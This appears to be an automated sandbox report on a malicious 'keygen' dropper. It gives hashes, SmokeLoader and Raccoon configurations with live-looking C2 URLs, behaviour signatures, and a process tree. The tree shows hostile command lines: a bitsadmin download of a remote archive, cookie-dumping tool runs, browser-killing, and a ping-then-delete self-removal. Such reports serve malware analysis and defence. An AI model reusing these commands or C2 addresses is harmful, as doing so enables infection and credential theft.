Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    255s
  • max time network
    259s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    04-05-2021 14:36

Errors

Reason
Machine shutdown

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Detected facebook phishing page
  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 54 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 24 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 60 IoCs
  • Modifies data under HKEY_USERS 33 IoCs
  • Modifies registry class 40 IoCs
  • Modifies system certificate store 2 TTPs 15 IoCs
  • NTFS ADS 3 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 12 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SetWindowsHookEx 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:892
        • C:\Windows\system32\wbem\WMIADAP.EXE
          wmiadap.exe /F /T /R
          3⤵
            PID:2036
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {6AE6E9BB-B12E-4B19-94AB-033A85DF06E4} S-1-5-18:NT AUTHORITY\System:Service:
            3⤵
              PID:2900
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
                4⤵
                • Executes dropped EXE
                PID:2760
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
                4⤵
                • Executes dropped EXE
                PID:1036
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
                4⤵
                • Executes dropped EXE
                PID:2208
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
                4⤵
                • Executes dropped EXE
                PID:5520
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
                4⤵
                • Executes dropped EXE
                PID:5728
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
                4⤵
                • Executes dropped EXE
                PID:6384
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Modifies registry class
            PID:804
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
            • Drops file in System32 directory
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Modifies registry class
            PID:840
          • C:\Windows\system32\msiexec.exe
            C:\Windows\system32\msiexec.exe /V
            2⤵
            • Enumerates connected drives
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Modifies registry class
            PID:1168
            • C:\Windows\syswow64\MsiExec.exe
              C:\Windows\syswow64\MsiExec.exe -Embedding E9D4DF3203BAB2745E85B7D09CCFDE31 C
              3⤵
              • Loads dropped DLL
              PID:2680
            • C:\Windows\syswow64\MsiExec.exe
              C:\Windows\syswow64\MsiExec.exe -Embedding A7A41C0381172FA7F35985F8A8A4DC42
              3⤵
              • Blocklisted process makes network request
              • Loads dropped DLL
              PID:2140
              • C:\Windows\SysWOW64\taskkill.exe
                "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                4⤵
                • Kills process with taskkill
                PID:828
            • C:\Windows\syswow64\MsiExec.exe
              C:\Windows\syswow64\MsiExec.exe -Embedding D0B1F22951AD24E2275C812DEBF29625 M Global\MSI0000
              3⤵
                PID:2388
          • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
            "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
            1⤵
            • Loads dropped DLL
            • Checks whether UAC is enabled
            • Suspicious use of WriteProcessMemory
            PID:1084
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
              2⤵
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:844
              • C:\Windows\SysWOW64\rundll32.exe
                "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                3⤵
                • Loads dropped DLL
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1972
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:1780
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
              2⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1740
              • C:\Users\Admin\AppData\Local\Temp\is-P9AQ3.tmp\Install.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-P9AQ3.tmp\Install.tmp" /SL5="$3017A,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1600
                • C:\Users\Admin\AppData\Local\Temp\is-JEN8M.tmp\Ultra.exe
                  "C:\Users\Admin\AppData\Local\Temp\is-JEN8M.tmp\Ultra.exe" /S /UID=burnerch1
                  4⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Drops file in Program Files directory
                  • Modifies system certificate store
                  • Suspicious use of WriteProcessMemory
                  PID:1444
                  • C:\Program Files\Google\PKOBAFEPRK\ultramediaburner.exe
                    "C:\Program Files\Google\PKOBAFEPRK\ultramediaburner.exe" /VERYSILENT
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:536
                    • C:\Users\Admin\AppData\Local\Temp\is-OBIND.tmp\ultramediaburner.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-OBIND.tmp\ultramediaburner.tmp" /SL5="$10190,281924,62464,C:\Program Files\Google\PKOBAFEPRK\ultramediaburner.exe" /VERYSILENT
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Drops file in Program Files directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of WriteProcessMemory
                      PID:1988
                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                        7⤵
                        • Executes dropped EXE
                        PID:1976
                  • C:\Users\Admin\AppData\Local\Temp\0a-f87f9-cc1-66091-af9cd9b39a5f7\Qecihelaelo.exe
                    "C:\Users\Admin\AppData\Local\Temp\0a-f87f9-cc1-66091-af9cd9b39a5f7\Qecihelaelo.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:1252
                    • C:\Program Files\Internet Explorer\iexplore.exe
                      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                      6⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SetWindowsHookEx
                      PID:1736
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1736 CREDAT:275457 /prefetch:2
                        7⤵
                        • Modifies Internet Explorer settings
                        • NTFS ADS
                        • Suspicious use of SetWindowsHookEx
                        PID:2008
                  • C:\Users\Admin\AppData\Local\Temp\c8-4ed63-92a-28d87-50ca8eca396d1\Fakytinazhy.exe
                    "C:\Users\Admin\AppData\Local\Temp\c8-4ed63-92a-28d87-50ca8eca396d1\Fakytinazhy.exe"
                    5⤵
                    • Executes dropped EXE
                    • Modifies system certificate store
                    • Suspicious behavior: EnumeratesProcesses
                    PID:928
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mmkhfrk5.ium\KiffMainE1.exe & exit
                      6⤵
                        PID:2176
                        • C:\Users\Admin\AppData\Local\Temp\mmkhfrk5.ium\KiffMainE1.exe
                          C:\Users\Admin\AppData\Local\Temp\mmkhfrk5.ium\KiffMainE1.exe
                          7⤵
                          • Executes dropped EXE
                          PID:2448
                          • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                            dw20.exe -x -s 532
                            8⤵
                            • Suspicious behavior: GetForegroundWindowSpam
                            PID:2504
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hs0puexk.qi3\001.exe & exit
                        6⤵
                          PID:2488
                          • C:\Users\Admin\AppData\Local\Temp\hs0puexk.qi3\001.exe
                            C:\Users\Admin\AppData\Local\Temp\hs0puexk.qi3\001.exe
                            7⤵
                              PID:2532
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zxxe1a3y.bdd\installer.exe /qn CAMPAIGN="654" & exit
                            6⤵
                              PID:2664
                              • C:\Users\Admin\AppData\Local\Temp\zxxe1a3y.bdd\installer.exe
                                C:\Users\Admin\AppData\Local\Temp\zxxe1a3y.bdd\installer.exe /qn CAMPAIGN="654"
                                7⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Enumerates connected drives
                                • Modifies system certificate store
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                • Suspicious use of FindShellTrayWindow
                                PID:2724
                                • C:\Windows\SysWOW64\msiexec.exe
                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\zxxe1a3y.bdd\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\zxxe1a3y.bdd\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619879509 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                  8⤵
                                    PID:2596
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\30f1vh0a.d2n\gpooe.exe & exit
                                6⤵
                                  PID:2336
                                  • C:\Users\Admin\AppData\Local\Temp\30f1vh0a.d2n\gpooe.exe
                                    C:\Users\Admin\AppData\Local\Temp\30f1vh0a.d2n\gpooe.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:2884
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                        PID:2936
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                        • Executes dropped EXE
                                        PID:2980
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fvdgbzvm.a01\google-game.exe & exit
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:2532
                                    • C:\Users\Admin\AppData\Local\Temp\fvdgbzvm.a01\google-game.exe
                                      C:\Users\Admin\AppData\Local\Temp\fvdgbzvm.a01\google-game.exe
                                      7⤵
                                        PID:2528
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                          8⤵
                                          • Loads dropped DLL
                                          • Modifies registry class
                                          PID:2604
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sgfl4wgd.zpw\askinstall39.exe & exit
                                      6⤵
                                        PID:2716
                                        • C:\Users\Admin\AppData\Local\Temp\sgfl4wgd.zpw\askinstall39.exe
                                          C:\Users\Admin\AppData\Local\Temp\sgfl4wgd.zpw\askinstall39.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          PID:2744
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /c taskkill /f /im chrome.exe
                                            8⤵
                                              PID:1908
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /f /im chrome.exe
                                                9⤵
                                                • Kills process with taskkill
                                                PID:3012
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a45rmdh2.0u1\setup.exe & exit
                                          6⤵
                                            PID:2832
                                            • C:\Users\Admin\AppData\Local\Temp\a45rmdh2.0u1\setup.exe
                                              C:\Users\Admin\AppData\Local\Temp\a45rmdh2.0u1\setup.exe
                                              7⤵
                                              • Executes dropped EXE
                                              PID:2936
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\a45rmdh2.0u1\setup.exe"
                                                8⤵
                                                  PID:3036
                                                  • C:\Windows\SysWOW64\PING.EXE
                                                    ping 1.1.1.1 -n 1 -w 3000
                                                    9⤵
                                                    • Runs ping.exe
                                                    PID:828
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oky5sy0w.uhg\request2.exe & exit
                                              6⤵
                                                PID:2628
                                                • C:\Users\Admin\AppData\Local\Temp\oky5sy0w.uhg\request2.exe
                                                  C:\Users\Admin\AppData\Local\Temp\oky5sy0w.uhg\request2.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                  PID:1644
                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                                    8⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    PID:2800
                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                      parse.exe -f json -b firefox
                                                      9⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:2480
                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                      parse.exe -f json -b edge
                                                      9⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:1512
                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                      parse.exe -f json -b chrome
                                                      9⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                      PID:2936
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tktjst3b.yix\SunLabsPlayer.exe /S & exit
                                                6⤵
                                                  PID:3056
                                                  • C:\Users\Admin\AppData\Local\Temp\tktjst3b.yix\SunLabsPlayer.exe
                                                    C:\Users\Admin\AppData\Local\Temp\tktjst3b.yix\SunLabsPlayer.exe /S
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Drops file in Program Files directory
                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                    PID:2420
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdADFD.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:2472
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdADFD.tmp\tempfile.ps1"
                                                        8⤵
                                                        • Drops file in Program Files directory
                                                        PID:3756
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdADFD.tmp\tempfile.ps1"
                                                        8⤵
                                                        • Drops file in Program Files directory
                                                        PID:8080
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdADFD.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:2160
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdADFD.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:8164
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdADFD.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:8112
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdADFD.tmp\tempfile.ps1"
                                                              8⤵
                                                              • Checks for any installed AV software in registry
                                                              • Drops file in Program Files directory
                                                              PID:8096
                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                              "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                              8⤵
                                                              • Download via BitsAdmin
                                                              PID:1092
                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfGNXVQDAS5gsjBB -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                              8⤵
                                                                PID:2132
                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pqoEjL4JJuJeAe4u -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                8⤵
                                                                  PID:2136
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdADFD.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:2060
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdADFD.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:1896
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdADFD.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:2744
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdADFD.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:2480
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdADFD.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:832
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdADFD.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:2848
                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                              8⤵
                                                                                PID:2404
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cqfheagm.0tt\005.exe & exit
                                                                            6⤵
                                                                              PID:3036
                                                                              • C:\Users\Admin\AppData\Local\Temp\cqfheagm.0tt\005.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\cqfheagm.0tt\005.exe
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:2528
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wyas2kcp.ewu\ifhwwyy.exe & exit
                                                                              6⤵
                                                                                PID:2384
                                                                                • C:\Users\Admin\AppData\Local\Temp\wyas2kcp.ewu\ifhwwyy.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\wyas2kcp.ewu\ifhwwyy.exe
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                  PID:3004
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3064
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2104
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q1qukg1y.hxi\toolspab1.exe & exit
                                                                                6⤵
                                                                                  PID:1420
                                                                                  • C:\Users\Admin\AppData\Local\Temp\q1qukg1y.hxi\toolspab1.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\q1qukg1y.hxi\toolspab1.exe
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                    PID:2704
                                                                                    • C:\Users\Admin\AppData\Local\Temp\q1qukg1y.hxi\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\q1qukg1y.hxi\toolspab1.exe
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:2496
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3q3rmzwv.0gs\GcleanerWW.exe /mixone & exit
                                                                                  6⤵
                                                                                    PID:2988
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cdfydoqf.lwv\42a25820.exe & exit
                                                                                    6⤵
                                                                                      PID:2976
                                                                                      • C:\Users\Admin\AppData\Local\Temp\cdfydoqf.lwv\42a25820.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\cdfydoqf.lwv\42a25820.exe
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks SCSI registry key(s)
                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:2700
